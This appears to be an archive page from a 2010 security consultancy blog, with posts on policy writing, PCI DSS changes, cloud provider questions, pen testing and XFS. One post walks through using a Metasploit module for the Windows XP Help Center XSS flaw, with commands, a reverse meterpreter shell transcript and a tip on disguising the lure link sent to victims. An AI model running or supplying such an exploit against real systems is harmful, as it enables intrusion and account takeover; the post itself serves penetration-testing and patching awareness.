XFS 101: Cross-Frame Scripting Explained

Cross-Frame Scripting (XFS) is an attack related to cross-site scripting (XSS) and is commonly misunderstood from both offensive and defensive standpoints. This blog’s aim is to clear up confusion regarding what it means, what vulnerability it is exploiting, and a survey of suggested fixes available.

XFS exploits a bug in specific browsers that allows a parent frame to be exposed to events in an embedded iFrame inside of it. The exposure is limited to events only, and does not give full JavaScript cross domain access. Several examples exist illustrating the sniffing of keystrokes from an embedded iFrame (usually a login page) to an attacker controlled resource such as a remote Web server using an XML HttpRequest (XHR) surreptitiously in the background. This effectively provides a means to silently steal credentials being typed into the embedded iFrame by the victim. This attack in no way allows full JavaScript execution despite being similar to XSS.

Read more!

Tuesday, August 10, 2010

Information Security Policies and Procedures, Part 2

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 3 , Part 4 , Part 5 , Part 6

Knowing which policies are necessary in your environment can be a challenge. Most organizations will have at least some formalized policies. Many of these are in response to legal requirements (HR policies) or specific incidents. After someone leaves their laptop in the car trunk for six hours on a 100-degree day, a policy on the care of equipment is generally issued.

With policies and procedures, it is essential to be proactive rather than reactive. In the case of the melted laptop, it would be far better to have instituted a policy regarding equipment care prior to the incident. That may be a simplistic scenario where the company is out a thousand dollars for a laptop, but it illustrates a point. This proactive posture becomes far more important when applied to more complex situations. What if, instead of being out a thousand dollars for a laptop, you were instead out tens or hundreds of thousands of dollars in fines after a cardholder data breach? Or worse, in the case of HIPAA, you find yourself with tremendous legal bills or in jail. (I am aware that is an extreme case, but it is illustrative of my point.)

As far as information security goes, every organization will have a unique set of foundational policies. Although many will be common to all organizations, the unique qualities of each organization call for custom policies. How, then, do we determine what basic policies we need? I have found that one of the simplest ways to determine which policies are essential is to look at all applicable regulations, laws, standards, and contracts and perform a gap assessment. For example, if you are subject to the PCI DSS, a good way to start is to take a copy of the standard and identify every place where a policy or procedure is required. PCI requires a policy on visitors to your facilities. As such, part of being compliant with PCI will be developing a visitor policy per the specific requirements of the standard. An important caveat: having a policy in place does not equal compliance.

An auditor will not only look for the policy, they will also look for evidence that the policy is enforced. So, for our example of a visitor policy, the auditor will want to see the associated visitor logs and will check whether visitors are issued a visitor badge per the policy. Careful readers will note that I slipped in mention of another document, the visitor log. In many cases, documentation leads to more documents. In this case, you will also likely need to develop training and awareness programs. Procedures for the receptionist to follow will help ensure that visitors are correctly logged. An awareness program lets employees understand that the policy exists, as well as the rationale behind it.

As you move through the standard or regulation identifying where documentation is necessary, keep a list of which policies address which sections. At the conclusion of the gap assessment of the applicable regulations and standards, you will have a firm understanding of what policies and related documentation are necessary. Keep in mind that, in addition, it is important to review contractual obligations. These generally exist between you and your clients, vendors, and other service providers. Involving your legal department is always recommended.
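The tracking list this produces can be as simple as a requirement-to-policy mapping; anything left unmapped is a gap. A minimal sketch (the requirement IDs and policy names below are illustrative, not a real PCI mapping):

```python
# Which policies address which requirements (illustrative IDs and names).
coverage = {
    "PCI DSS 9.4 (visitor log)": ["Visitor Policy", "Physical Security Policy"],
    "PCI DSS 12.1 (security policy)": ["Information Security Policy"],
    "PCI DSS 12.6 (awareness program)": [],  # nothing written yet
}

# Any requirement with no covering policy is a gap to close.
gaps = [req for req, policies in coverage.items() if not policies]
print(gaps)  # → ['PCI DSS 12.6 (awareness program)']
```

A spreadsheet works just as well; the point is that the mapping, not the tool, is what tells you where documentation is still missing.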

In the next part of this series we will cover some of the pitfalls to avoid.

Read more!

Monday, August 9, 2010

A Week of Security in Vegas: Black Hat, Bsides, & Defcon

Towards the end of summer each year the information security world descends on Las Vegas for a week of training, discussion and the disclosure of a year’s worth of quiet research. I’ve been attending off and on for years, and was joined this year by several of my new SecureState co-workers from Profiling and Risk Management.

The week started off with the biggest and most expensive of the three events: Black Hat Las Vegas. This is the original and largest of the Black Hat events held around the world each year, and it has often been a forum for disclosing some of the most cutting-edge and impactful research within information security. The biggest talk this year, hands down, was Barnaby Jack’s presentation on compromising Automated Teller Machines. Barnaby had attempted to give a similar presentation in 2009, but his employer pulled the talk after pressure was applied by some unnamed ATM manufacturers. After changing employers and adding several new ATMs to his collection, Barnaby was back this year to give a live demo of local and remote compromise of two different ATMs.

Read more!

Thursday, August 5, 2010

Moving To The Cloud Primer

Everywhere you look, there are articles, research, and analysis on the topic of cloud computing. It has even been termed “the most significant shift in information technology in our lifetimes.” The positive aspects are exciting and offer many benefits, including access to applications, storage for legacy data, and powerful computer processing, all with the click of a mouse. For companies that want to avoid purchasing entire systems of IT software and hiring the talent to operate and secure them, this option may seem very tempting. One common concern that should be analyzed and researched thoroughly is the issue of security in cloud computing. Any future cloud user should gather as much information as possible about a potential cloud provider before sending any data to the cloud.

For instance, it would be wise to ask any potential cloud provider how they protect against malicious insider activity. One question that should be submitted is if a provider conducts background checks on all relevant employees. Nothing like sending PII to a cloud provider that lacks knowledge on who is working for them. Additionally, questions on employee monitoring, access determination, and audit trails would also be appropriate. Some providers may not want to divulge such technical information. If the cloud provider does not want to provide such information, ask if they have any monitoring and access control policies and procedures in place. If they don’t, tell them to create some and make it part of the service contract. One way or another, you’re going to want to be protected.

For those cloud providers that are providing Software as a Service where all development is handled on the provider side, questions on the system development lifecycle would apply. For example, customers will want to know if the cloud provider has incorporated security into their SDLC. Also, see if the future cloud provider takes into consideration the OWASP Cloud Top 10 during the development cycle. Lastly, ask the provider if they follow Cloud Security Alliance guidance for critical focus areas. If the cloud provider answers in the negative or has no idea what you’re talking about, it may be best to look for another provider.

As touched on above, some cloud computing companies practice the “security by obscurity” method, which will usually exacerbate the fears of the company seeking cloud services. It is a fine line to walk, because the cloud computing company does not want to divulge too much information, which could compromise their security from malicious attackers. However they should want to be as transparent as possible to their potential clients. Try to find a cloud computing company that offers voluntary monthly or quarterly security reports. This report will show the client what issues the company is addressing, without broadcasting information that compromises their security posture.

What other types of data are being stored by the cloud provider? Do they allow data that may be malicious code, spamming data or information related to criminal activity? In multi-tenant environments “Innocent” data can be located on the same shared infrastructure as “Malicious” data. This should be investigated thoroughly before choosing a cloud provider. Specific questions about strict registration and validation processes and ongoing monitoring of network traffic before, after and during storage and use should be the norm. Besides, if the provider accepts unscrupulous clients and the provider’s defense in depth as well as compartmentalization is weak, what’s to stop a malicious tenant from accessing your data?

Before utilizing any cloud services, customers should conduct an internal assessment for any regulatory compliance complications. Many regulations demand that certain classes of data not be intermingled with other, less sensitive data, such as on multi-tenant shared servers or databases. Additionally, data retention laws vary among countries, with limits on what can be stored, and for how long, heavily regulated in some jurisdictions. Some countries even make it unlawful for certain data to be transferred to foreign cloud providers. When the data is no longer needed, most retention laws will require the cloud provider to wipe the data clean before the storage is returned to the shared pool. Can your cloud provider provide this service? Also, many regulations and standards require some sort of logging, as well as log review, in order to be compliant (PCI, anybody?). However, most cloud provider logs are internal, and access to these logs by customers or auditors may be difficult. As a result, this type of scenario would make complying with such a regulation or standard nearly impossible. Consequently, a compliance impact assessment should be carried out before moving to the cloud.

In conclusion, there are many concerns that companies must consider before utilizing the Cloud. The concerns highlighted in this blog post are only the tip of the iceberg. Therefore, a proper assessment of any cloud provider is warranted for any organization planning a move to the cloud.

Read more!

Tuesday, August 3, 2010

Information Security Policies and Procedures, Part 1

Note: This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 2 , Part 3 , Part 4 , Part 5 , Part 6

Policy writing can be a daunting task, and one for which many are not overly enthused. However, Policies and Procedures are an integral part of any information security program. Not only do they provide direction and accountability, many specific policy elements are a requirement of specific laws, regulations, and/or standards. In this multipart series, I will work to help you become comfortable writing policies and their associated procedures.

Before we get started, there are a few things that are important to know.

Policy sets are different in each environment. With information security, the number of policies as well as the breadth of each policy will vary depending on the complexity of the environment as well as the sensitivity and criticality of the information. There are other factors that will affect information security policy development as well. For example, it is common that some of the elements of an Acceptable Use Policy will already be covered in basic HR policies and employee handbooks. It is essential that different departments work together to ensure that policies work in concert and do not contradict each other.

It is also essential to determine the audience for any given policy. For most users, the Acceptable Use Policy will determine the rules for their access. Network Security Policies, Access Control Policies, and System Access Logging and Maintenance Policies will have IT departments as their audience. It is also important to note that certain policies may be confidential according to an asset classification program. A Network Security Policy delineating requirements for protections such as connection restrictions or intrusion protection and detection may be valuable for an attacker. It is vital to consider business need to know when distributing policies.

The Differences Between Policies, Procedures, and Standards

It is important to understand the differences between a policy, procedure, and standard, and the functions of each. Policies delineate the laws for an organization. Procedures and standards describe how to implement policies. A simple analogy is that of a red light. The policy, or law, requires that drivers come to a complete stop at any and all red lights. The procedure, however, will describe how to depress the brake, operate the clutch, etc. The standard would describe what types of brakes and tires are appropriate. An exception process would describe the circumstances under which the policy may be violated--in this example, an emergency vehicle.

In the next part of this series, we will discuss how to determine which policies are necessary for your environment.


Read more!

Monday, August 2, 2010

Vulnerability Assessments are not Penetration Tests!

Too often I, as well as many of my co-workers, go into a client site and, during whatever assessment I am working on, general questions come up like, “When’s the last time you’ve had a pen test?” And the client responds, “Ohhh, we do those annually with ‘Some Corporation.’” And after looking at ‘Some Corporation’s’ website and seeing what they consider to be a penetration test, I am again disgusted to see that they show up with a vulnerability scanner, run it, validate some findings, and are off to their next client.

Now I know these are some brash comments aimed at some random security companies, but let’s be honest here: if you’re going to do something, do it right the first time and give your client the value of the assessment they paid for. If I go to a salesman to buy a sports car and he tries to sell me a Honda Civic, I’m going somewhere else to get what I asked for. On the other side of the coin is the fact that a lot of companies that want a penetration test don’t really understand what one is to begin with. It seems to me that gone are the days of true pen testing, when the dreaded “Red Team” shows up to strike real fear into the hearts and minds of security practitioners at Fortune 1000 companies.

Any kid in their parents’ basement with savvy computer skills can fire up Nessus, a web application scanner, or QualysGuard against a network, and some of those people can actually interpret the results to make sense of them. Trust me, everyone on SecureState’s Profiling Team can do that with their eyes closed, but how many security companies out there can actually run a legitimate pen test? I’m not calling anyone out and challenging them, but in all reality, I just want to know how many companies are willing to admit that what they call a “penetration test” is actually just a vulnerability assessment. Even worse is the number of companies who perform so-called “penetration tests” and truly believe that a vulnerability assessment is the same thing as a pen test.

So let’s all be clear here: a true penetration test is over 85 percent manual, and the remaining 15 percent can be a vulnerability scanner used to get some additional findings into the report in order to provide extra value to the client. And let’s also define manual attacks so as not to rule out all tools. Using a port scanner is very different from using nCircle, Qualys, or Nessus; automated scanners like these are the tools that don’t really help a pen test. And just because you use a tool like the Metasploit Framework or many of the tools in Back|Track 4 doesn’t mean you are running a vulnerability scanner. Nmap has the ability to run scripts as well, but again, it doesn’t belong in the vulnerability scanner category.

Many times, companies perform attack and penetration tests due to compliance, or potentially other reasons, which is a bad idea. It gives those companies the opportunity to choose malicious compliance over truly assessing the security of the entire company. Malicious compliance is a term used when companies do the bare minimum in order to achieve a stamp of approval for whatever standard they are trying to satisfy. When companies choose to perform pen tests on only the systems affected by compliance, such as PCI or HIPAA systems, entire networks of systems go untested. When this happens, companies aren’t getting the true value of what a pen test can provide.

SecureState is a trend-setting company, and this is where we are going to step in and say, “We Pen Test!” The PCI Security Standards Council has at least defined what it considers a penetration test. In section 11.3, the Council explains that a “vulnerability assessment simply identifies and reports noted vulnerabilities, whereas a penetration test attempts to exploit the vulnerabilities to determine whether unauthorized access or other malicious activity is possible.” Even the EC-Council states that “Penetration testing simulates methods that intruders use to gain unauthorized access to an organization’s networked systems and then compromise them. Penetration testers may use proprietary and/or open source tools to test known technical vulnerabilities in networked systems. Apart from automated techniques, penetration testing involves manual techniques for conducting targeted testing on specific systems to ensure that there are no security flaws that may have gone undetected earlier.”

The SecureState Profiling Team takes lower-risk vulnerabilities in some systems, combines them with additional vulnerabilities in other systems, and links them together into larger attacks. Pulling off an attack in this fashion demonstrates what the Profiling Team calls Vulnerability Linkage Theory, which shows why it’s important to maintain system baselines and other security measures: the end compromise results from coupling vulnerabilities across many systems. For instance, username enumeration from a website, coupled with a brute-force attack on the mail system, could allow SecureState to access a company’s mail. From there we can email the tech support team and social engineer them into divulging information on how to access the corporate VPN, and voila: access to the internal corporate network. There is no way a vulnerability scanner can do that.

Penetration tests zero in on specific systems in order to break in and see what information can be divulged. Pilfering computers and file shares demonstrates the benefits of pen tests by turning up important documents and unencrypted data. Even password-protected Microsoft Office files can be cracked to release potentially serious data about the company we’re hacking into. Pen tests can also be used by security departments to show why things need to be fixed and to secure budget to move forward.

There are conflicting views on pen tests and vulnerability scans. Pen tests aren’t performed to find vulnerabilities; they are done in order to compromise systems and networks. The main difference between the two is that in a pen test the attackers are actually exploiting vulnerabilities in systems, adding user accounts, and compromising machines across the network. A full or total compromise, meaning total control over the entire network, is the end goal of a pen test. Throughout a pen test, the attackers will inevitably generate a list of findings. Many of these findings may be the same as what a vulnerability assessment would turn up, but there are many vulnerabilities that scanners just can’t find, which comes down to the fact that tools can’t think; consultants can. Consultants are able to interpret results and decide how to use them in order to leverage certain attack vectors against machines and networks.

Don’t get me wrong: I am not discounting the need for, or value of, a vulnerability assessment. These assessments, as well as pen tests, have their place. What I am saying is that both need to be better understood so that organizations know how and when each should be performed. We have also seen companies that run regular vulnerability assessments where the same vulnerabilities come up in every single scan. These companies are either overwhelmed by the number of vulnerabilities present in their networks and don’t know how to fix them, or they don’t see the value or need in fixing them. Penetration tests can reinforce the case for remediation. In turn, by better understanding the difference, clients will know what to expect as a final product and won’t be dissatisfied with the results of each test.

Read more!

Friday, July 23, 2010


I was recently interviewed on News Channel 5 about tabnabbing, a new technique that can be used for phishing. In a tabnabbing attack, one of your browser tabs changes, usually without your knowledge, to an attacker-controlled website. The page typically changes to something that looks familiar to the victim, like Gmail, Facebook, or Twitter, which can trick the victim into thinking they have been logged out of the site. If the victim enters their credentials into the phishing site, the credentials are sent to the attacker. They are then harvested and the victim is forwarded to the legitimate website.

Check out the video and article over at

Read more!

Thursday, July 22, 2010

Be An Information Security Green Beret

Not so long ago while flipping through channels on the TV I happened upon a documentary of the United States Army’s Special Forces, also known as the “Green Berets.” Never having served myself, my perception of this group was always based more on movies like “Rambo” where the Green Beret is an unstoppable one-man army who takes on the bad guys singlehandedly. In the real world, of course, this turns out not to be the case.

The Green Berets have many different groups and many different missions. And while like Rambo they are expected to have exceptional and specialized combat skills, what was fascinating to me was the focus on “soft skills.” One of their missions is to build insurgent and counter-insurgent groups from whatever groups of people they have available. They need to be able to communicate with natives of foreign countries, train them in the use of weapons and tactics, and lead them into battle. A single 12-man “A-Team” is expected to be capable of building and leading a 200-member guerrilla force! Within the military this is called a “Force Multiplier” and it’s a very powerful concept.

Read more!

Thursday, July 15, 2010

Getting Things Done: Stop Debating Security Minutiae

Many are familiar with David Allen's "Getting Things Done" methodology, used for time management to increase productivity and focus. Do you use it? Ask yourself, "What is the next physical action required to move this project forward?" Repeat this process until everything in the world is finished. It's just that simple.

What are minutiae? Minor details. More importantly, minutiae are minor details of negligible importance.

Negligible importance? Yes, negligible. Meaning, when you're studying something of larger magnitude, the items of negligible importance can be ignored or neglected. That's right, move on, you've got bigger fish to fry.

• We've got to look at better anti-virus software because our current one is not detecting malware X!
• We can't force our clients to change their passwords to our external portal! We'll have an uprising and get a ton of calls!
• Writing policy is a waste of time because employees won't follow the rules!
• Risk management has no place here because we don't even have time to patch all of our systems!
• Don't bring up PCI compliance around the CFO, he won't care.

We love to debate minutiae everywhere, in all facets of life. Information security is no different; it's a beloved exercise because it absolves us from actually having to do anything. And it makes us feel good! It makes us feel satisfied (mmm, tasty tasty minutiae)! But really all we've done is spun our wheels, and failed to persuade or change people’s minds.

Debating minutiae is crippling for a security program; it stunts growth and maturity. Building a security program around minutiae is paralyzing. An organization will lay band-aids on everything in front of them; they'll focus only on the trees instead of the forest. They'll only discuss what's comfortable, or what's within their wheelhouse.

Now, move away from your keyboard, settle down, and retract your claws, Mr. Devil's-In-The-Details. A wise older man with a tablet recently told me, “One man’s minutiae is another man’s job description.” I'm not saying you should ignore specificity to the point of ambiguity. You absolutely need details. But you need them only at specific times. More often than not, they confuse and delay. They take the focus off of root, systemic issues, and that feels good to everyone involved, because then they can talk about the things that are in front of them all day, the things they're experts in (read: comfortable). Do you work for a large organization? How many meetings were you in today that lasted more than an hour? Did you spend the majority of that time talking about things that didn't really matter at that point? Most meetings are filled with trivial details rather than the minor details that actually matter.

You want to get things done? Start big, skim the surface across all areas, bring up uncomfortable security topics, continually assess, and then do something with that information: build a plan, and establish success and failure criteria for what you’re trying to get done so that you can clearly separate the minutiae from the bull’s-eye. Once you’ve got the bull’s-eye, create a timeline and go. The important details will shake themselves out. I promise. People who get things done realize this. Call us if you'd like to talk about it.

Read more!

Wednesday, July 7, 2010

Trust, But Verify: Full-Time Compliance

You can Google "trust, but verify" and come up with hundreds of articles regarding one of Ronald Reagan's signature catch phrases, accountability, auditing, etc. It can also be considered the default credo of the auditing community. Regardless of where it came from and the potential overuse of the phrase, it's what I live by and is a code that should be followed by anyone responsible for their company's compliance/governance programs and the security of sensitive data. Just about every regulation that deals with the protection of sensitive information requires some form of risk management and/or validation of controls. Proper compliance and risk management programs will not be successful without a high level of verification that proper security controls are in place and operating effectively.

Read more!

Tuesday, June 29, 2010

Acceptance is the first step

There’s a line. It’s an imaginary line, but it’s there and I’ve seen it manifest itself. It usually appears when an organization’s security division has to deliver a third party security assessment to their executive management. On one side of the line is the sincere quest for security improvement, on the other, internal politics and finger pointing. I have seen good people step right over that line in a well-intentioned act of self-preservation. When this happens, it can bring into question the role of the third party assessor.

Read more!

Thursday, June 24, 2010

The Case for Legal Defensibility

I came across an interesting read the other day when researching future data security laws and regulations. The article I came across, titled "The Legal Defensibility Era," discussed the legal defensibility doctrine and its application in the information security arena. The whole premise of legal defensibility is to look beyond the check-the-box compliance mentality and build an information security program based on a reasonable standard of care for a particular organization. One of the intended benefits of building a security program based on reasonability is to lower one's liability risk.

It is apparent in today's compliance atmosphere that most organizations will do only the minimum necessary as required by law or regulation to secure themselves. Worse yet, other organizations will fail to implement any information security program either because most laws and regulations don't apply to them or they decided to accept all risk and push their luck.

What exacerbates this already complex problem is the myriad of laws and regulations facing each organization. With so many laws and regulations out in the wild, it's not surprising for information security departments to feel overwhelmed and create unplanned, improvised programs protecting only the proverbial "low hanging fruit." Furthermore, risk management, when conducted improperly, can share some of the blame for poor security practices. If a proper risk rating cannot be ascertained during the risk assessment, improper decisions can follow, such as accepting a risk in a way that greatly inflates the organization's risk appetite, or mitigating a risk that should have been accepted.

Now, I'm not saying risk management and the patchwork of laws and regulations have no place in legal defensibility, because they do. Risk management is a very important spoke in the legal defensibility wheel, as it demonstrates one is acting reasonably when it comes to securing information. Also, a law is a law; if you have to follow it, then you have to follow it. However, only following the minimum requirements of any law or regulation won't necessarily make your organization more secure. In fact, it may even give you a false sense of assurance.

What legal defensibility provides in these situations is a reasonable standard that can serve as a defense against potential lawsuits or fines if there is a breach in information security. For instance, an organization that follows only the "minimum necessary" mentality may realize after a proper legal defensibility assessment that its current state of security is not adequate and would not meet a "reasonable" standard. In that situation its entire information security program may be worthless if it cannot provide a shield in a legal or regulatory action.

For example, a certain regulation may have stipulated implementing only some type of access controls, but let's assume it would have been more reasonable to also implement some sort of encryption. Should a breach occur, the legal system may take an unfavorable view of your security program for not implementing an encryption solution, and may even consider your organization incompetent. This could result in higher liability expenses, fees, and fines. This is especially true if the law or regulation does not provide a safe harbor for meeting the minimum requirements.

Read more!

Thursday, June 17, 2010


Smartphones have become an integral part of our lives; we rely on them for everything. They hold all of our personal information: calendars, emails, phone numbers, text messages, and documents. However, the average user is not very savvy when it comes to the security of these devices. A user can browse to one of the many app stores and download just about anything, and most users do just that. One of the exciting things about smartphones is their customization. You can get any type of application you want, and most of the time it is free: games, productivity applications, web servers, and FTP servers. Users feel a false sense of security because it is “just a phone” and the apps must be secure because they come from an app store. In reality, these apps are developed by programmers of varying levels and skill sets, and security might not be their top priority. None of the app stores put apps through a thorough security check; most run virus scans, but usually only on a random sample, and only after the app is posted. Even Apple has fallen victim to mobile malware. Some apps have been signed as safe by the stores only to have malicious code discovered at a later date. Samsung’s Wave even shipped with malware on the SD card, which activated as soon as the phone was connected to a PC.

Read more!

Monday, June 14, 2010

Windows XP Help Center Client Side Attack

With the Patch Tuesday release of XP zero-days last week, I started checking around for proofs of concept and ran across the following posts.

The above advisories are for Windows XP, which many businesses still run, and involve an XSS attack, something many developers and site owners feel isn't really a threat. Read below to find out why XSS is dangerous.

After reading the above advisories I checked in Metasploit, and a working exploit is already available within the framework.

If you are on an internal or client-side penetration test, you generally see most clients running Windows XP and outdated browsers: IE6, IE7, or IE8. The above advisories describe a way of using a cross-site scripting attack to gain full control of the victim. The essence of the attack is an unhandled XSS in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be accessed directly via a URL in a browser. By using the defer attribute in the XSS to execute a script in a privileged zone, the Windows popup is bypassed, so the victim never has to click through any annoying prompts for the attack to work.

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

The Help Center exploit works on XP SP2 and SP3, which covers most clients in most companies; I do not see many companies running Vista or Windows 7. IE6 and IE7 are vulnerable to this attack without a popup. IE8 works too, but with a user popup box, unless the victim is running certain versions of Windows Media Player. I also just tested this with an IE8 browser running in compatibility mode: when the client visited the page, the exploit automatically pulled up the help docs and gave me a Meterpreter shell. Woot!
I am thinking this would be a good exploit to use in client-side penetration tests, so below is the info and a quick usage example.

Module Name:

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
"Help and Support Center is the default application provided to
access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme "hcp". Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

Send Your Link to the Victim and wait:
Now send the victim a link to your IP address via email or chat. Generally I would use a registered URL that looks friendly and send them that, so as not to look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to
[*] Responding to request for exploit iframe at
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -l
Active sessions
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter EXPLOIT\Administrator @ EXPLOIT ->
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:
With the coming of a new Patch Tuesday, a whole slew of exploits are available for Windows XP. The moral of the story is: UPDATE YOUR SYSTEMS. The Metasploit module above sets up a server and waits for your victim to make a connection; when the victim connects, a help window opens and they are silently owned. More than likely the victim will just think Windows is acting up, as Windows usually does, or that they accidentally clicked something. :)

Read more!

Thursday, June 10, 2010

Upcoming PCI DSS Changes

It’s getting to be that time of year again; PCI ROC season is right around the corner. Though the new version of PCI DSS (Version 2.0?) is not due out until October, many of my clients are asking what changes they should expect.

Every two years the PCI Security Standards Council (PCI SSC) issues a new version of the Payment Card Industry Data Security Standard (PCI DSS) as part of the lifecycle and feedback review process from a wide range of organizations. No major changes are expected in the upcoming release, just clarifications.

For starters, look for an update to Requirement 6.5 (secure web application development) to reflect changes in the OWASP Top 10. You will see two new Top 10 entries: Security Misconfiguration and Unvalidated Redirects and Forwards. Gone are Malicious File Execution (6.5.3) and Information Leakage and Improper Error Handling (6.5.6). Keep in mind that (per the PCI DSS) whenever a new version of the OWASP Top 10 is released, it’s implied that the current requirements are to be replaced with the latest OWASP updates.

Expect to see Information Supplements that provide guidance and clarification on a range of emerging technologies. One of the first will address the use of Virtualization technologies. The Virtualization Special Interest Group (SIG) has been busy putting together a white paper and a mapping "tool" document that explains where virtualization applies within each requirement of the DSS. You can find more information on the Virtualization SIG here. Other papers to be published are anticipated to address end-to-end encryption, tokenization and even the Eurocard-MasterCard-Visa (EMV) chip-card standard.

In another change, the PCI SSC is expected to clarify what constitutes acceptable network segmentation. Although segmenting the cardholder data environment from the rest of the network is not required by the PCI DSS, it is the only cost-effective way to address compliance. Without segmentation, your entire network is considered in scope and subject to PCI compliance.

Lastly, there should be clarification on strong one-way hashing of Primary Account Numbers (PAN). Organizations can remove PAN data from PCI scope either by truncation (deleting all but the first 6 and last 4 digits) or using a secure one-way hash that cannot be reversed. This clarification promises to be a welcome step in helping organizations and their QSAs clarify what is and what is not in scope.
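As a rough sketch of the two out-of-scope options, assuming a 16-digit PAN: truncation keeps the first 6 and last 4 digits, and hashing should be keyed (or strongly salted), since a plain hash of a 16-digit number is feasible to brute-force, which is exactly the ambiguity the clarification should address. The key and test PAN below are illustrative only.

```python
import hashlib
import hmac

def truncate_pan(pan):
    # Keep first 6 (the BIN) and last 4 digits; mask the middle.
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]

def hash_pan(pan, key):
    # A keyed one-way hash. An unkeyed hash of a 16-digit PAN can be
    # brute-forced, so a secret key (or strong salt) is essential.
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()

pan = "4111111111111111"  # standard test card number
print(truncate_pan(pan))             # 411111******1111
print(hash_pan(pan, b"secret-key"))  # 64-hex-character digest
```

Either form removes the stored value from PCI scope because the full PAN cannot be recovered from it.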

Read more!

Friday, June 4, 2010

Why Can’t We All Just Get Along?

During a recent discussion at work, the benefits of a sound security program outside of the context of repelling malicious assaults came up. What would be the gain of a security program if there was no one attempting to break into a network? How would the role of security for Information Technology change? Would security careers come to a crashing halt?

To give the discussion a framework, the following parameters were agreed upon:

  1. Suddenly everybody in the world is neither malicious nor unscrupulous.

  2. While there is still competition in industry, it is driven only by the idea that each competitor will attempt to outperform the others by creating better products at a lower cost; there is no espionage or market for trade secrets.

  3. Nobody is intentionally harming the network or systems, so there will be no worms, Trojans, or computer viruses.

  4. This is global, so as to remove the possibility of foreign attackers, military or otherwise.

  5. People would still be capable of errors and would have disagreements founded in misunderstanding, but these disagreements would be settled through mediation, court, or rock-paper-scissors.

We talked about this for a while, but had no way to quantify either side of the argument.

So, in this world with no bad guys, period, what benefit would there be to a security program? Which areas would remain the same? What could be removed from a security program? And what does this mean for how we look at security programs as they currently exist?

To keep things simple, I thought it would be easiest to measure what percentage of change would occur in a recognized information security management standard, BS7799. This way I could determine what changes would occur to security programs more globally, and using a recognized standard seemed more appropriate than what one company or another might find useful for its individual needs.

The next step was to go through the standard and determine whether each of its components would stay or go. To do this, an audit checklist of the BS7799 by Val Thiagarajan, available through SANS, was used to concisely summarize the intent of the standard, as its directed questioning leads to each section's focus. The results, with the rationale used to decide each section's fate, assume a standards-based program for a medium-sized business founded on the three principles of security: confidentiality, integrity, and availability. They can be found here:

By tallying up the results, albeit subjectively, it was found that even without “bad guys,” 77.95 percent of the BS7799 is still applicable. This bodes well for the justification of a security program, even in a world free of bad guys. Unsurprisingly, given the outlined framework, for a medium-sized business the dramatic swing away from confidentiality towards integrity and availability maintained the need for a security program. Availability and integrity are key to processing orders, a major factor in most businesses. What was surprising was the extent to which the standard addresses these two areas, given how much emphasis security writing typically places on mitigating attackers. It crystallized further during this process how underrepresented the principles of availability and integrity are in most security conversations, given their weight. I hear a lot of “What will you do if this box gets compromised?” and very little “What is your plan if your RAID array gets corrupted?” at the speaking engagements I attend. Without attention to these core concepts, a program can get very lopsided.
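The tally itself is simple arithmetic. The counts below are hypothetical, chosen only to reproduce the 77.95 percent figure reported above (any pair of counts with the same ratio would do); the real numbers come from the checklist exercise.

```python
# Hypothetical counts illustrating the applicability tally;
# the actual figures come from the BS7799 checklist review.
applicable_controls = 99
total_controls = 127

still_applicable = round(100 * applicable_controls / total_controls, 2)
print(still_applicable)  # 77.95
```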

Hopefully this lends perspective to anyone a hacker hasn’t yet breached: there is still a need for a sound security program. Furthermore, it will hopefully guide people towards revisiting their business continuity programs to see how much their systems affect the cash coming into their businesses, and how important it is to develop a security program with processes in place to ensure access to those systems, and the foresight to recover them.

Even without bad guys security would play a vital role for Information Technology, though it may change its name to “Continuity Planning”.

Read more!